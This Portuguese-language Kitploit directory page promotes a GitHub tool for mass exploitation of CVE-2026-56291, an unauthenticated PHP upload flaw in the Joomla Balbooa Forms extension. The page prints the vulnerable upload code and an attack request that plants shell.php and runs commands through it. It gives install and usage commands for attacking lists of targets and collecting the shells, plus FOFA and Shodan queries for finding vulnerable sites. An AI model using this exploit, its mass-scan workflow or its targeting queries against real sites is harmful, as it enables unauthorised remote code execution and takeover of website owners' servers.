Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — Upload de Arquivo Não Autenticado para RCE via form.uploadAttachmentFile | CVSS 9.8 | CISA KEV | Kitploit
Ferramentas/GitHubGitHub/shinthink/cve-2026-56291
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — Upload de Arquivo Não Autenticado para RCE via form.uploadAttachmentFile | CVSS 9.8 | CISA KEV

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-56291 — Exploit RCE em Massa Balbooa Forms Joomla

Pré-Auth form.uploadAttachmentFile → Sem CSRF → Upload PHP


Visão Geral

CVE-2026-56291 é uma vulnerabilidade crítica (CVSS 9.8) de upload arbitrário de arquivo não autenticado na extensão Balbooa Forms (com_baforms) do Joomla (< 2.4.1).

A tarefa frontend form.uploadAttachmentFile não chama Session::checkToken() nem realiza qualquer verificação de permissão. Os arquivos enviados usam diretamente a extensão do atacante: $fileName = $name . '.' . $ext. Os arquivos vão para images/baforms/uploads/form-{id}/ — diretamente executáveis como PHP.

Versões Afetadas

VersãoStatus
1.0 – 2.4.0Vulnerável
2.4.1+Corrigido

CISA KEV: Adicionado em 10 de julho de 2026 — exploração ativa confirmada.


Mecanismo da Vulnerabilidade

Causa Raiz

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

Fluxo do Ataque

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

Instalação

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

Uso

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

Referências

RecursoLink
CISA KEVcisa.gov/known-exploited-vulnerabilities
Detalhes da Correçãomysites.guru
PesquisadorPhil Taylor

Não afiliado à Balbooa.

Baixar ferramenta